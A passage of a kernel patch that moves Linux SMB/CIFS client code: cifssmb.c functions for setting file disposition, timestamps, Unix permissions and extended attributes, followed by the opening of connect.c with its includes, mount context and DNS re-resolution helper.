++	 * calls, since the file handle passed in is no longer valid.
++	 */
++
++	return rc;
++}
++
++int
++CIFSSMBSetFileDisposition(const unsigned int xid, struct cifs_tcon *tcon,
++			  bool delete_file, __u16 fid, __u32 pid_of_opener)
++{
++	struct smb_com_transaction2_sfi_req *pSMB  = NULL;
++	char *data_offset;
++	int rc = 0;
++	__u16 params, param_offset, offset, byte_count, count;
++
++	cifs_dbg(FYI, "Set File Disposition (via SetFileInfo)\n");
++	rc = small_smb_init(SMB_COM_TRANSACTION2, 15, tcon, (void **) &pSMB);
++
++	if (rc)
++		return rc;
++
++	pSMB->hdr.Pid = cpu_to_le16((__u16)pid_of_opener);
++	pSMB->hdr.PidHigh = cpu_to_le16((__u16)(pid_of_opener >> 16));
++
++	params = 6;
++	pSMB->MaxSetupCount = 0;
++	pSMB->Reserved = 0;
++	pSMB->Flags = 0;
++	pSMB->Timeout = 0;
++	pSMB->Reserved2 = 0;
++	param_offset = offsetof(struct smb_com_transaction2_sfi_req, Fid) - 4;
++	offset = param_offset + params;
++
++	/* SMB offsets are from the start of the SMB header, 4 bytes past the RFC1001 length field */
++	data_offset = (char *)(pSMB) + offset + 4;
++
++	count = 1;
++	pSMB->MaxParameterCount = cpu_to_le16(2);
++	/* BB find max SMB PDU from sess */
++	pSMB->MaxDataCount = cpu_to_le16(1000);
++	pSMB->SetupCount = 1;
++	pSMB->Reserved3 = 0;
++	pSMB->SubCommand = cpu_to_le16(TRANS2_SET_FILE_INFORMATION);
++	byte_count = 3 /* pad */  + params + count;
++	pSMB->DataCount = cpu_to_le16(count);
++	pSMB->ParameterCount = cpu_to_le16(params);
++	pSMB->TotalDataCount = pSMB->DataCount;
++	pSMB->TotalParameterCount = pSMB->ParameterCount;
++	pSMB->ParameterOffset = cpu_to_le16(param_offset);
++	pSMB->DataOffset = cpu_to_le16(offset);
++	pSMB->Fid = fid;
++	pSMB->InformationLevel = cpu_to_le16(SMB_SET_FILE_DISPOSITION_INFO);
++	pSMB->Reserved4 = 0;
++	inc_rfc1001_len(pSMB, byte_count);
++	pSMB->ByteCount = cpu_to_le16(byte_count);
++	*data_offset = delete_file ? 1 : 0;
++	rc = SendReceiveNoRsp(xid, tcon->ses, (char *) pSMB, 0);
++	cifs_small_buf_release(pSMB);
++	if (rc)
++		cifs_dbg(FYI, "Send error in SetFileDisposition = %d\n", rc);
++
++	return rc;
++}
++
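++/*
++ * Fallback for CIFSSMBSetPathInfo(): open the file and set the times via
++ * the handle-based CIFSSMBSetFileInfo() instead. Used when the server
++ * returns -EOPNOTSUPP for the path-based call (see CIFSSMBSetPathInfo()
++ * below).
++ */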
++static int
++CIFSSMBSetPathInfoFB(const unsigned int xid, struct cifs_tcon *tcon,
++		     const char *fileName, const FILE_BASIC_INFO *data,
++		     const struct nls_table *nls_codepage,
++		     struct cifs_sb_info *cifs_sb)
++{
++	int oplock = 0;
++	struct cifs_open_parms oparms;
++	struct cifs_fid fid;
++	int rc;
++
++	oparms = (struct cifs_open_parms) {
++		.tcon = tcon,
++		.cifs_sb = cifs_sb,
++		.desired_access = GENERIC_WRITE,
++		.create_options = cifs_create_options(cifs_sb, 0),
++		.disposition = FILE_OPEN,
++		.path = fileName,
++		.fid = &fid,
++	};
++
++	rc = CIFS_open(xid, &oparms, &oplock, NULL);
++	if (rc)
++		goto out;
++
++	rc = CIFSSMBSetFileInfo(xid, tcon, data, fid.netfid, current->tgid);
++	CIFSSMBClose(xid, tcon, fid.netfid);
++out:
++	return rc;
++}
++
++int
++CIFSSMBSetPathInfo(const unsigned int xid, struct cifs_tcon *tcon,
++		   const char *fileName, const FILE_BASIC_INFO *data,
++		   const struct nls_table *nls_codepage,
++		   struct cifs_sb_info *cifs_sb)
++{
++	TRANSACTION2_SPI_REQ *pSMB = NULL;
++	TRANSACTION2_SPI_RSP *pSMBr = NULL;
++	int name_len;
++	int rc = 0;
++	int bytes_returned = 0;
++	char *data_offset;
++	__u16 params, param_offset, offset, byte_count, count;
++	int remap = cifs_remap(cifs_sb);
++
++	cifs_dbg(FYI, "In SetTimes\n");
++
++SetTimesRetry:
++	rc = smb_init(SMB_COM_TRANSACTION2, 15, tcon, (void **) &pSMB,
++		      (void **) &pSMBr);
++	if (rc)
++		return rc;
++
++	if (pSMB->hdr.Flags2 & SMBFLG2_UNICODE) {
++		name_len =
++		    cifsConvertToUTF16((__le16 *) pSMB->FileName, fileName,
++				       PATH_MAX, nls_codepage, remap);
++		name_len++;	/* trailing null */
++		name_len *= 2;
++	} else {
++		name_len = copy_path_name(pSMB->FileName, fileName);
++	}
++
++	params = 6 + name_len;
++	count = sizeof(FILE_BASIC_INFO);
++	pSMB->MaxParameterCount = cpu_to_le16(2);
++	/* BB find max SMB PDU from sess structure BB */
++	pSMB->MaxDataCount = cpu_to_le16(1000);
++	pSMB->MaxSetupCount = 0;
++	pSMB->Reserved = 0;
++	pSMB->Flags = 0;
++	pSMB->Timeout = 0;
++	pSMB->Reserved2 = 0;
++	param_offset = offsetof(struct smb_com_transaction2_spi_req,
++				InformationLevel) - 4;
++	offset = param_offset + params;
++	data_offset = (char *) (&pSMB->hdr.Protocol) + offset;
++	pSMB->ParameterOffset = cpu_to_le16(param_offset);
++	pSMB->DataOffset = cpu_to_le16(offset);
++	pSMB->SetupCount = 1;
++	pSMB->Reserved3 = 0;
++	pSMB->SubCommand = cpu_to_le16(TRANS2_SET_PATH_INFORMATION);
++	byte_count = 3 /* pad */  + params + count;
++
++	pSMB->DataCount = cpu_to_le16(count);
++	pSMB->ParameterCount = cpu_to_le16(params);
++	pSMB->TotalDataCount = pSMB->DataCount;
++	pSMB->TotalParameterCount = pSMB->ParameterCount;
++	if (tcon->ses->capabilities & CAP_INFOLEVEL_PASSTHRU)
++		pSMB->InformationLevel = cpu_to_le16(SMB_SET_FILE_BASIC_INFO2);
++	else
++		pSMB->InformationLevel = cpu_to_le16(SMB_SET_FILE_BASIC_INFO);
++	pSMB->Reserved4 = 0;
++	inc_rfc1001_len(pSMB, byte_count);
++	memcpy(data_offset, data, sizeof(FILE_BASIC_INFO));
++	pSMB->ByteCount = cpu_to_le16(byte_count);
++	rc = SendReceive(xid, tcon->ses, (struct smb_hdr *) pSMB,
++			 (struct smb_hdr *) pSMBr, &bytes_returned, 0);
++	if (rc)
++		cifs_dbg(FYI, "SetPathInfo (times) returned %d\n", rc);
++
++	cifs_buf_release(pSMB);
++
++	if (rc == -EAGAIN)
++		goto SetTimesRetry;
++
++	if (rc == -EOPNOTSUPP)
++		return CIFSSMBSetPathInfoFB(xid, tcon, fileName, data,
++					    nls_codepage, cifs_sb);
++
++	return rc;
++}
++
++static void
++cifs_fill_unix_set_info(FILE_UNIX_BASIC_INFO *data_offset,
++			const struct cifs_unix_set_info_args *args)
++{
++	u64 uid = NO_CHANGE_64, gid = NO_CHANGE_64;
++	u64 mode = args->mode;
++
++	if (uid_valid(args->uid))
++		uid = from_kuid(&init_user_ns, args->uid);
++	if (gid_valid(args->gid))
++		gid = from_kgid(&init_user_ns, args->gid);
++
++	/*
++	 * Samba servers ignore a request to set the file size to zero, due
++	 * to bugs in some older clients. But we should be precise: we use
++	 * SetFileSize to set the file size, and do not want to truncate it
++	 * to zero accidentally (as happened on one Samba server beta when
++	 * zero was put here instead of -1).
++	 */
++	data_offset->EndOfFile = cpu_to_le64(NO_CHANGE_64);
++	data_offset->NumOfBytes = cpu_to_le64(NO_CHANGE_64);
++	data_offset->LastStatusChange = cpu_to_le64(args->ctime);
++	data_offset->LastAccessTime = cpu_to_le64(args->atime);
++	data_offset->LastModificationTime = cpu_to_le64(args->mtime);
++	data_offset->Uid = cpu_to_le64(uid);
++	data_offset->Gid = cpu_to_le64(gid);
++	/* better to leave device as zero when it is  */
++	data_offset->DevMajor = cpu_to_le64(MAJOR(args->device));
++	data_offset->DevMinor = cpu_to_le64(MINOR(args->device));
++	data_offset->Permissions = cpu_to_le64(mode);
++
++	if (S_ISREG(mode))
++		data_offset->Type = cpu_to_le32(UNIX_FILE);
++	else if (S_ISDIR(mode))
++		data_offset->Type = cpu_to_le32(UNIX_DIR);
++	else if (S_ISLNK(mode))
++		data_offset->Type = cpu_to_le32(UNIX_SYMLINK);
++	else if (S_ISCHR(mode))
++		data_offset->Type = cpu_to_le32(UNIX_CHARDEV);
++	else if (S_ISBLK(mode))
++		data_offset->Type = cpu_to_le32(UNIX_BLOCKDEV);
++	else if (S_ISFIFO(mode))
++		data_offset->Type = cpu_to_le32(UNIX_FIFO);
++	else if (S_ISSOCK(mode))
++		data_offset->Type = cpu_to_le32(UNIX_SOCKET);
++}
++
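++/*
++ * Illustrative sketch of how a caller might fill the args for the helper
++ * above (hypothetical values, not taken from this file): to change only
++ * the mode, everything else is marked "no change":
++ *
++ *	struct cifs_unix_set_info_args args = {
++ *		.mode	= S_IFREG | 0644,
++ *		.uid	= INVALID_UID,
++ *		.gid	= INVALID_GID,
++ *		.ctime	= NO_CHANGE_64,
++ *		.atime	= NO_CHANGE_64,
++ *		.mtime	= NO_CHANGE_64,
++ *		.device	= 0,
++ *	};
++ *
++ * uid_valid()/gid_valid() fail for INVALID_UID/INVALID_GID, so the helper
++ * sends NO_CHANGE_64 for those fields.
++ */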
++int
++CIFSSMBUnixSetFileInfo(const unsigned int xid, struct cifs_tcon *tcon,
++		       const struct cifs_unix_set_info_args *args,
++		       u16 fid, u32 pid_of_opener)
++{
++	struct smb_com_transaction2_sfi_req *pSMB  = NULL;
++	char *data_offset;
++	int rc = 0;
++	u16 params, param_offset, offset, byte_count, count;
++
++	cifs_dbg(FYI, "Set Unix Info (via SetFileInfo)\n");
++	rc = small_smb_init(SMB_COM_TRANSACTION2, 15, tcon, (void **) &pSMB);
++
++	if (rc)
++		return rc;
++
++	pSMB->hdr.Pid = cpu_to_le16((__u16)pid_of_opener);
++	pSMB->hdr.PidHigh = cpu_to_le16((__u16)(pid_of_opener >> 16));
++
++	params = 6;
++	pSMB->MaxSetupCount = 0;
++	pSMB->Reserved = 0;
++	pSMB->Flags = 0;
++	pSMB->Timeout = 0;
++	pSMB->Reserved2 = 0;
++	param_offset = offsetof(struct smb_com_transaction2_sfi_req, Fid) - 4;
++	offset = param_offset + params;
++
++	data_offset = (char *)pSMB +
++			offsetof(struct smb_hdr, Protocol) + offset;
++
++	count = sizeof(FILE_UNIX_BASIC_INFO);
++
++	pSMB->MaxParameterCount = cpu_to_le16(2);
++	/* BB find max SMB PDU from sess */
++	pSMB->MaxDataCount = cpu_to_le16(1000);
++	pSMB->SetupCount = 1;
++	pSMB->Reserved3 = 0;
++	pSMB->SubCommand = cpu_to_le16(TRANS2_SET_FILE_INFORMATION);
++	byte_count = 3 /* pad */  + params + count;
++	pSMB->DataCount = cpu_to_le16(count);
++	pSMB->ParameterCount = cpu_to_le16(params);
++	pSMB->TotalDataCount = pSMB->DataCount;
++	pSMB->TotalParameterCount = pSMB->ParameterCount;
++	pSMB->ParameterOffset = cpu_to_le16(param_offset);
++	pSMB->DataOffset = cpu_to_le16(offset);
++	pSMB->Fid = fid;
++	pSMB->InformationLevel = cpu_to_le16(SMB_SET_FILE_UNIX_BASIC);
++	pSMB->Reserved4 = 0;
++	inc_rfc1001_len(pSMB, byte_count);
++	pSMB->ByteCount = cpu_to_le16(byte_count);
++
++	cifs_fill_unix_set_info((FILE_UNIX_BASIC_INFO *)data_offset, args);
++
++	rc = SendReceiveNoRsp(xid, tcon->ses, (char *) pSMB, 0);
++	cifs_small_buf_release(pSMB);
++	if (rc)
++		cifs_dbg(FYI, "Send error in Set Time (SetFileInfo) = %d\n",
++			 rc);
++
++	/*
++	 * Note: on an -EAGAIN error only the caller can retry handle-based
++	 * calls, since the file handle passed in is no longer valid.
++	 */
++
++	return rc;
++}
++
++int
++CIFSSMBUnixSetPathInfo(const unsigned int xid, struct cifs_tcon *tcon,
++		       const char *file_name,
++		       const struct cifs_unix_set_info_args *args,
++		       const struct nls_table *nls_codepage, int remap)
++{
++	TRANSACTION2_SPI_REQ *pSMB = NULL;
++	TRANSACTION2_SPI_RSP *pSMBr = NULL;
++	int name_len;
++	int rc = 0;
++	int bytes_returned = 0;
++	FILE_UNIX_BASIC_INFO *data_offset;
++	__u16 params, param_offset, offset, count, byte_count;
++
++	cifs_dbg(FYI, "In SetUID/GID/Mode\n");
++setPermsRetry:
++	rc = smb_init(SMB_COM_TRANSACTION2, 15, tcon, (void **) &pSMB,
++		      (void **) &pSMBr);
++	if (rc)
++		return rc;
++
++	if (pSMB->hdr.Flags2 & SMBFLG2_UNICODE) {
++		name_len =
++		    cifsConvertToUTF16((__le16 *) pSMB->FileName, file_name,
++				       PATH_MAX, nls_codepage, remap);
++		name_len++;	/* trailing null */
++		name_len *= 2;
++	} else {
++		name_len = copy_path_name(pSMB->FileName, file_name);
++	}
++
++	params = 6 + name_len;
++	count = sizeof(FILE_UNIX_BASIC_INFO);
++	pSMB->MaxParameterCount = cpu_to_le16(2);
++	/* BB find max SMB PDU from sess structure BB */
++	pSMB->MaxDataCount = cpu_to_le16(1000);
++	pSMB->MaxSetupCount = 0;
++	pSMB->Reserved = 0;
++	pSMB->Flags = 0;
++	pSMB->Timeout = 0;
++	pSMB->Reserved2 = 0;
++	param_offset = offsetof(struct smb_com_transaction2_spi_req,
++				InformationLevel) - 4;
++	offset = param_offset + params;
++	/* SMB offsets are from the start of the SMB header, 4 bytes past the RFC1001 length field */
++	data_offset = (FILE_UNIX_BASIC_INFO *)((char *) pSMB + offset + 4);
++	memset(data_offset, 0, count);
++	pSMB->DataOffset = cpu_to_le16(offset);
++	pSMB->ParameterOffset = cpu_to_le16(param_offset);
++	pSMB->SetupCount = 1;
++	pSMB->Reserved3 = 0;
++	pSMB->SubCommand = cpu_to_le16(TRANS2_SET_PATH_INFORMATION);
++	byte_count = 3 /* pad */  + params + count;
++	pSMB->ParameterCount = cpu_to_le16(params);
++	pSMB->DataCount = cpu_to_le16(count);
++	pSMB->TotalParameterCount = pSMB->ParameterCount;
++	pSMB->TotalDataCount = pSMB->DataCount;
++	pSMB->InformationLevel = cpu_to_le16(SMB_SET_FILE_UNIX_BASIC);
++	pSMB->Reserved4 = 0;
++	inc_rfc1001_len(pSMB, byte_count);
++
++	cifs_fill_unix_set_info(data_offset, args);
++
++	pSMB->ByteCount = cpu_to_le16(byte_count);
++	rc = SendReceive(xid, tcon->ses, (struct smb_hdr *) pSMB,
++			 (struct smb_hdr *) pSMBr, &bytes_returned, 0);
++	if (rc)
++		cifs_dbg(FYI, "SetPathInfo (perms) returned %d\n", rc);
++
++	cifs_buf_release(pSMB);
++	if (rc == -EAGAIN)
++		goto setPermsRetry;
++	return rc;
++}
++
++#ifdef CONFIG_CIFS_XATTR
++/*
++ * Do a path-based QUERY_ALL_EAS call and parse the result. This is a common
++ * function used by listxattr and getxattr type calls. When ea_name is set,
++ * it looks for that attribute name and stuffs that value into the EAData
++ * buffer. When ea_name is NULL, it stuffs a list of attribute names into the
++ * buffer. In both cases, the return value is either the length of the
++ * resulting data or a negative error code. If EAData is a NULL pointer then
++ * the data isn't copied to it, but the length is returned.
++ */
++ssize_t
++CIFSSMBQAllEAs(const unsigned int xid, struct cifs_tcon *tcon,
++		const unsigned char *searchName, const unsigned char *ea_name,
++		char *EAData, size_t buf_size,
++		struct cifs_sb_info *cifs_sb)
++{
++	/* BB assumes one setup word */
++	TRANSACTION2_QPI_REQ *pSMB = NULL;
++	TRANSACTION2_QPI_RSP *pSMBr = NULL;
++	int remap = cifs_remap(cifs_sb);
++	struct nls_table *nls_codepage = cifs_sb->local_nls;
++	int rc = 0;
++	int bytes_returned;
++	int list_len;
++	struct fealist *ea_response_data;
++	struct fea *temp_fea;
++	char *temp_ptr;
++	char *end_of_smb;
++	__u16 params, byte_count, data_offset;
++	unsigned int ea_name_len = ea_name ? strlen(ea_name) : 0;
++
++	cifs_dbg(FYI, "In Query All EAs path %s\n", searchName);
++QAllEAsRetry:
++	rc = smb_init(SMB_COM_TRANSACTION2, 15, tcon, (void **) &pSMB,
++		      (void **) &pSMBr);
++	if (rc)
++		return rc;
++
++	if (pSMB->hdr.Flags2 & SMBFLG2_UNICODE) {
++		list_len =
++		    cifsConvertToUTF16((__le16 *) pSMB->FileName, searchName,
++				       PATH_MAX, nls_codepage, remap);
++		list_len++;	/* trailing null */
++		list_len *= 2;
++	} else {
++		list_len = copy_path_name(pSMB->FileName, searchName);
++	}
++
++	params = 2 /* level */ + 4 /* reserved */ + list_len /* includes NUL */;
++	pSMB->TotalDataCount = 0;
++	pSMB->MaxParameterCount = cpu_to_le16(2);
++	/* BB find exact max SMB PDU from sess structure BB */
++	pSMB->MaxDataCount = cpu_to_le16(CIFSMaxBufSize);
++	pSMB->MaxSetupCount = 0;
++	pSMB->Reserved = 0;
++	pSMB->Flags = 0;
++	pSMB->Timeout = 0;
++	pSMB->Reserved2 = 0;
++	pSMB->ParameterOffset = cpu_to_le16(offsetof(
++	struct smb_com_transaction2_qpi_req, InformationLevel) - 4);
++	pSMB->DataCount = 0;
++	pSMB->DataOffset = 0;
++	pSMB->SetupCount = 1;
++	pSMB->Reserved3 = 0;
++	pSMB->SubCommand = cpu_to_le16(TRANS2_QUERY_PATH_INFORMATION);
++	byte_count = params + 1 /* pad */ ;
++	pSMB->TotalParameterCount = cpu_to_le16(params);
++	pSMB->ParameterCount = pSMB->TotalParameterCount;
++	pSMB->InformationLevel = cpu_to_le16(SMB_INFO_QUERY_ALL_EAS);
++	pSMB->Reserved4 = 0;
++	inc_rfc1001_len(pSMB, byte_count);
++	pSMB->ByteCount = cpu_to_le16(byte_count);
++
++	rc = SendReceive(xid, tcon->ses, (struct smb_hdr *) pSMB,
++			 (struct smb_hdr *) pSMBr, &bytes_returned, 0);
++	if (rc) {
++		cifs_dbg(FYI, "Send error in QueryAllEAs = %d\n", rc);
++		goto QAllEAsOut;
++	}
++
++	/*
++	 * BB: also check that enough total bytes were returned; the validity
++	 * checking of these trans2 responses needs to be improved.
++	 */
++
++	rc = validate_t2((struct smb_t2_rsp *)pSMBr);
++	if (rc || get_bcc(&pSMBr->hdr) < 4) {
++		rc = -EIO;	/* bad smb */
++		goto QAllEAsOut;
++	}
++
++	/*
++	 * Still to check (BB, validate_trans2_offsets()): that the length of
++	 * the list is not more than the bcc, that each entry does not go
++	 * beyond the length of the list, that each element of each entry
++	 * does not go beyond the end of the list, and whether start of smb +
++	 * data_offset > &bcc + bcc.
++	 */
++
++	data_offset = le16_to_cpu(pSMBr->t2.DataOffset);
++	ea_response_data = (struct fealist *)
++				(((char *) &pSMBr->hdr.Protocol) + data_offset);
++
++	list_len = le32_to_cpu(ea_response_data->list_len);
++	cifs_dbg(FYI, "ea length %d\n", list_len);
++	if (list_len <= 8) {
++		cifs_dbg(FYI, "empty EA list returned from server\n");
++		/* didn't find the named attribute */
++		if (ea_name)
++			rc = -ENODATA;
++		goto QAllEAsOut;
++	}
++
++	/* make sure list_len doesn't go past end of SMB */
++	end_of_smb = (char *)pByteArea(&pSMBr->hdr) + get_bcc(&pSMBr->hdr);
++	if ((char *)ea_response_data + list_len > end_of_smb) {
++		cifs_dbg(FYI, "EA list appears to go beyond SMB\n");
++		rc = -EIO;
++		goto QAllEAsOut;
++	}
++
++	/* account for ea list len */
++	list_len -= 4;
++	temp_fea = ea_response_data->list;
++	temp_ptr = (char *)temp_fea;
++	while (list_len > 0) {
++		unsigned int name_len;
++		__u16 value_len;
++
++		list_len -= 4;
++		temp_ptr += 4;
++		/* make sure we can read name_len and value_len */
++		if (list_len < 0) {
++			cifs_dbg(FYI, "EA entry goes beyond length of list\n");
++			rc = -EIO;
++			goto QAllEAsOut;
++		}
++
++		name_len = temp_fea->name_len;
++		value_len = le16_to_cpu(temp_fea->value_len);
++		list_len -= name_len + 1 + value_len;
++		if (list_len < 0) {
++			cifs_dbg(FYI, "EA entry goes beyond length of list\n");
++			rc = -EIO;
++			goto QAllEAsOut;
++		}
++
++		if (ea_name) {
++			if (ea_name_len == name_len &&
++			    memcmp(ea_name, temp_ptr, name_len) == 0) {
++				temp_ptr += name_len + 1;
++				rc = value_len;
++				if (buf_size == 0)
++					goto QAllEAsOut;
++				if ((size_t)value_len > buf_size) {
++					rc = -ERANGE;
++					goto QAllEAsOut;
++				}
++				memcpy(EAData, temp_ptr, value_len);
++				goto QAllEAsOut;
++			}
++		} else {
++			/* account for the "user." prefix and trailing null */
++			rc += (5 + 1 + name_len);
++			if (rc < (int) buf_size) {
++				memcpy(EAData, "user.", 5);
++				EAData += 5;
++				memcpy(EAData, temp_ptr, name_len);
++				EAData += name_len;
++				/* null terminate name */
++				*EAData = 0;
++				++EAData;
++			} else if (buf_size == 0) {
++				/* skip copy - calc size only */
++			} else {
++				/* stop before overrun buffer */
++				rc = -ERANGE;
++				break;
++			}
++		}
++		temp_ptr += name_len + 1 + value_len;
++		temp_fea = (struct fea *)temp_ptr;
++	}
++
++	/* didn't find the named attribute */
++	if (ea_name)
++		rc = -ENODATA;
++
++QAllEAsOut:
++	cifs_buf_release(pSMB);
++	if (rc == -EAGAIN)
++		goto QAllEAsRetry;
++
++	return (ssize_t)rc;
++}
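++
++/*
++ * Illustrative usage of CIFSSMBQAllEAs() (hypothetical caller; the
++ * attribute name "foo" is made up):
++ *
++ *	value_len = CIFSSMBQAllEAs(xid, tcon, path, "foo", buf, buflen, cifs_sb);
++ *	list_len  = CIFSSMBQAllEAs(xid, tcon, path, NULL, buf, buflen, cifs_sb);
++ *
++ * The first form is a getxattr-style lookup of one EA value; the second
++ * is a listxattr-style enumeration of names. Passing buf_size == 0
++ * returns only the required length in either mode.
++ */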
++
++int
++CIFSSMBSetEA(const unsigned int xid, struct cifs_tcon *tcon,
++	     const char *fileName, const char *ea_name, const void *ea_value,
++	     const __u16 ea_value_len, const struct nls_table *nls_codepage,
++	     struct cifs_sb_info *cifs_sb)
++{
++	struct smb_com_transaction2_spi_req *pSMB = NULL;
++	struct smb_com_transaction2_spi_rsp *pSMBr = NULL;
++	struct fealist *parm_data;
++	int name_len;
++	int rc = 0;
++	int bytes_returned = 0;
++	__u16 params, param_offset, byte_count, offset, count;
++	int remap = cifs_remap(cifs_sb);
++
++	cifs_dbg(FYI, "In SetEA\n");
++SetEARetry:
++	rc = smb_init(SMB_COM_TRANSACTION2, 15, tcon, (void **) &pSMB,
++		      (void **) &pSMBr);
++	if (rc)
++		return rc;
++
++	if (pSMB->hdr.Flags2 & SMBFLG2_UNICODE) {
++		name_len =
++		    cifsConvertToUTF16((__le16 *) pSMB->FileName, fileName,
++				       PATH_MAX, nls_codepage, remap);
++		name_len++;	/* trailing null */
++		name_len *= 2;
++	} else {
++		name_len = copy_path_name(pSMB->FileName, fileName);
++	}
++
++	params = 6 + name_len;
++
++	/*
++	 * Done calculating parms using name_len of the file name; now reuse
++	 * name_len for the length of the EA name we are going to create in
++	 * the inode xattrs.
++	 */
++	if (ea_name == NULL)
++		name_len = 0;
++	else
++		name_len = strnlen(ea_name, 255);
++
++	count = sizeof(*parm_data) + ea_value_len + name_len;
++	pSMB->MaxParameterCount = cpu_to_le16(2);
++	/* BB find max SMB PDU from sess */
++	pSMB->MaxDataCount = cpu_to_le16(1000);
++	pSMB->MaxSetupCount = 0;
++	pSMB->Reserved = 0;
++	pSMB->Flags = 0;
++	pSMB->Timeout = 0;
++	pSMB->Reserved2 = 0;
++	param_offset = offsetof(struct smb_com_transaction2_spi_req,
++				InformationLevel) - 4;
++	offset = param_offset + params;
++	pSMB->InformationLevel =
++		cpu_to_le16(SMB_SET_FILE_EA);
++
++	parm_data = (void *)pSMB + offsetof(struct smb_hdr, Protocol) + offset;
++	pSMB->ParameterOffset = cpu_to_le16(param_offset);
++	pSMB->DataOffset = cpu_to_le16(offset);
++	pSMB->SetupCount = 1;
++	pSMB->Reserved3 = 0;
++	pSMB->SubCommand = cpu_to_le16(TRANS2_SET_PATH_INFORMATION);
++	byte_count = 3 /* pad */  + params + count;
++	pSMB->DataCount = cpu_to_le16(count);
++	parm_data->list_len = cpu_to_le32(count);
++	parm_data->list[0].EA_flags = 0;
++	/* we checked above that name len is less than 255 */
++	parm_data->list[0].name_len = (__u8)name_len;
++	/* EA names are always ASCII */
++	if (ea_name)
++		strncpy(parm_data->list[0].name, ea_name, name_len);
++	parm_data->list[0].name[name_len] = 0;
++	parm_data->list[0].value_len = cpu_to_le16(ea_value_len);
++	/* caller ensures that ea_value_len is less than 64K but
++	we need to ensure that it fits within the smb */
++
++	/*BB add length check to see if it would fit in
++	     negotiated SMB buffer size BB */
++	/* if (ea_value_len > buffer_size - 512 (enough for header)) */
++	if (ea_value_len)
++		memcpy(parm_data->list[0].name+name_len+1,
++		       ea_value, ea_value_len);
++
++	pSMB->TotalDataCount = pSMB->DataCount;
++	pSMB->ParameterCount = cpu_to_le16(params);
++	pSMB->TotalParameterCount = pSMB->ParameterCount;
++	pSMB->Reserved4 = 0;
++	inc_rfc1001_len(pSMB, byte_count);
++	pSMB->ByteCount = cpu_to_le16(byte_count);
++	rc = SendReceive(xid, tcon->ses, (struct smb_hdr *) pSMB,
++			 (struct smb_hdr *) pSMBr, &bytes_returned, 0);
++	if (rc)
++		cifs_dbg(FYI, "SetPathInfo (EA) returned %d\n", rc);
++
++	cifs_buf_release(pSMB);
++
++	if (rc == -EAGAIN)
++		goto SetEARetry;
++
++	return rc;
++}
++#endif
+diff --git a/fs/smb/client/connect.c b/fs/smb/client/connect.c
+new file mode 100644
+index 0000000000000..935fe198a4baf
+--- /dev/null
++++ b/fs/smb/client/connect.c
+@@ -0,0 +1,4754 @@
++// SPDX-License-Identifier: LGPL-2.1
++/*
++ *
++ *   Copyright (C) International Business Machines  Corp., 2002,2011
++ *   Author(s): Steve French (sfrench@us.ibm.com)
++ *
++ */
++#include <linux/fs.h>
++#include <linux/net.h>
++#include <linux/string.h>
++#include <linux/sched/mm.h>
++#include <linux/sched/signal.h>
++#include <linux/list.h>
++#include <linux/wait.h>
++#include <linux/slab.h>
++#include <linux/pagemap.h>
++#include <linux/ctype.h>
++#include <linux/utsname.h>
++#include <linux/mempool.h>
++#include <linux/delay.h>
++#include <linux/completion.h>
++#include <linux/kthread.h>
++#include <linux/pagevec.h>
++#include <linux/freezer.h>
++#include <linux/namei.h>
++#include <linux/uuid.h>
++#include <linux/uaccess.h>
++#include <asm/processor.h>
++#include <linux/inet.h>
++#include <linux/module.h>
++#include <keys/user-type.h>
++#include <net/ipv6.h>
++#include <linux/parser.h>
++#include <linux/bvec.h>
++#include "cifspdu.h"
++#include "cifsglob.h"
++#include "cifsproto.h"
++#include "cifs_unicode.h"
++#include "cifs_debug.h"
++#include "cifs_fs_sb.h"
++#include "ntlmssp.h"
++#include "nterr.h"
++#include "rfc1002pdu.h"
++#include "fscache.h"
++#include "smb2proto.h"
++#include "smbdirect.h"
++#include "dns_resolve.h"
++#ifdef CONFIG_CIFS_DFS_UPCALL
++#include "dfs_cache.h"
++#endif
++#include "fs_context.h"
++#include "cifs_swn.h"
++
++extern mempool_t *cifs_req_poolp;
++extern bool disable_legacy_dialects;
++
++/* FIXME: should these be tunable? */
++#define TLINK_ERROR_EXPIRE	(1 * HZ)
++#define TLINK_IDLE_EXPIRE	(600 * HZ)
++
++/* Drop the connection to not overload the server */
++#define NUM_STATUS_IO_TIMEOUT   5
++
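++/* Scratch state passed between the mount helper functions in this file. */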
++struct mount_ctx {
++	struct cifs_sb_info *cifs_sb;
++	struct smb3_fs_context *fs_ctx;
++	unsigned int xid;
++	struct TCP_Server_Info *server;
++	struct cifs_ses *ses;
++	struct cifs_tcon *tcon;
++#ifdef CONFIG_CIFS_DFS_UPCALL
++	struct cifs_ses *root_ses;
++	uuid_t mount_id;
++	char *origin_fullpath, *leaf_fullpath;
++#endif
++};
++
++static int ip_connect(struct TCP_Server_Info *server);
++static int generic_ip_connect(struct TCP_Server_Info *server);
++static void tlink_rb_insert(struct rb_root *root, struct tcon_link *new_tlink);
++static void cifs_prune_tlinks(struct work_struct *work);
++
++/*
++ * Resolve hostname and set ip addr in tcp ses. Useful for hostnames that may
++ * get their ip addresses changed at some point.
++ *
++ * This should be called with server->srv_mutex held.
++ */
++static int reconn_set_ipaddr_from_hostname(struct TCP_Server_Info *server)
++{
++	int rc;
++	int len;
++	char *unc, *ipaddr = NULL;
++	time64_t expiry, now;
++	unsigned long ttl = SMB_DNS_RESOLVE_INTERVAL_DEFAULT;
++
++	if (!server->hostname)
++		return -EINVAL;
++
++	/* if server hostname isn't populated, there's nothing to do here */
++	if (server->hostname[0] == '\0')
++		return 0;
++
++	len = strlen(server->hostname) + 3;
++
++	unc = kmalloc(len, GFP_KERNEL);
++	if (!unc) {
++		cifs_dbg(FYI, "%s: failed to create UNC path\n", __func__);
++		return -ENOMEM;
++	}
++	scnprintf(unc, len, "\\\\%s", server->hostname);
++
++	rc = dns_resolve_server_name_to_ip(unc, &ipaddr, &expiry);
++	kfree(unc);
++
++	if (rc < 0) {
++		cifs_dbg(FYI, "%s: failed to resolve server part of %s to IP: %d\n",
++			 __func__, server->hostname, rc);
++		goto requeue_resolve;
++	}
++
++	spin_lock(&server->srv_lock);
++	rc = cifs_convert_address((struct sockaddr *)&server->dstaddr, ipaddr,
++				  strlen(ipaddr));
++	spin_unlock(&server->srv_lock);
++	kfree(ipaddr);
++
++	/* rc == 1 means success here */
++	if (rc) {
++		now = ktime_get_real_seconds();
++		if (expiry && expiry > now)
++			/*
++			 * To make sure we don't use the cached entry, retry 1s
++			 * after expiry.
++			 */
++			ttl = max_t(unsigned long, expiry - now, SMB_DNS_RESOLVE_INTERVAL_MIN) + 1;
++	}
++	rc = !rc ? -1 : 0;
++
++requeue_resolve:
++	cifs_dbg(FYI, "%s: next dns resolution scheduled for %lu seconds in the future\n",
